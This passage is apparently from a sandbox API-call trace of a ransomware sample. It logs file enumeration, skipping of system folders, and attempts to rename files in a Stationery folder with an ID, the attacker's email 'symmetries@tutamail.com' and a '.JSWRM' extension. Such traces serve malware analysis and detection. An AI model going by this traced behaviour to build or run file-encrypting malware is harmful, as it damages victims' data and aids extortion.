lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.855] CloseHandle (hObject=0xffffffff) returned 1 [0068.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0068.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0068.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0068.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.856] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.856] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2=".") returned 1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="..") returned 1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="...") returned 1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="windows") returned -1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="recovery") returned -1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="perflogs") returned -1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="documents and settings") returned 1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.856] lstrcmpiW (lpString1="Peacock.htm", lpString2="system volume information") returned -1 [0068.857] lstrcmpiW (lpString1="Peacock.htm", lpString2="msocache") returned 1 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.htm", lpUsedDefaultChar=0x0) returned 11 [0068.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.htm", lpUsedDefaultChar=0x0) returned 11 [0068.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.857] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.857] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.857] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.857] CloseHandle (hObject=0xffffffff) returned 1 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0068.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.858] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.858] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".") returned 1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="..") returned 1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="...") returned 1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="windows") returned -1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="recovery") returned -1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="perflogs") returned -1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="documents and settings") returned 1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="system volume information") returned -1 [0068.858] lstrcmpiW (lpString1="Peacock.jpg", lpString2="msocache") returned 1 [0068.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.jpg", lpUsedDefaultChar=0x0) returned 11 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.jpg", lpUsedDefaultChar=0x0) returned 11 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.886] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9454425611678720) returned 0 [0068.886] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.886] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.886] CloseHandle (hObject=0xffffffff) returned 1 [0068.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0068.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0068.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.887] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.887] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96dccc65, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0068.887] lstrcmpiW (lpString1="Roses.htm", lpString2=".") returned 1 [0068.887] lstrcmpiW (lpString1="Roses.htm", lpString2="..") returned 1 [0068.887] lstrcmpiW (lpString1="Roses.htm", lpString2="...") returned 1 [0068.887] lstrcmpiW (lpString1="Roses.htm", lpString2="windows") returned -1 [0068.888] lstrcmpiW (lpString1="Roses.htm", lpString2="recovery") returned 1 [0068.888] lstrcmpiW (lpString1="Roses.htm", lpString2="perflogs") returned 1 [0068.888] lstrcmpiW (lpString1="Roses.htm", lpString2="documents and settings") returned 1 [0068.888] lstrcmpiW (lpString1="Roses.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.888] lstrcmpiW (lpString1="Roses.htm", lpString2="system volume information") returned -1 [0068.888] lstrcmpiW (lpString1="Roses.htm", lpString2="msocache") returned 1 [0068.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.htm", lpUsedDefaultChar=0x0) returned 9 [0068.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.htm", lpUsedDefaultChar=0x0) returned 9 [0068.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.889] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.889] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.889] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.889] CloseHandle (hObject=0xffffffff) returned 1 [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0068.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0068.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0068.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.890] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96dccc65, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96dccc65, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96dccc65, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x60002, dwReserved1=0x20942e, 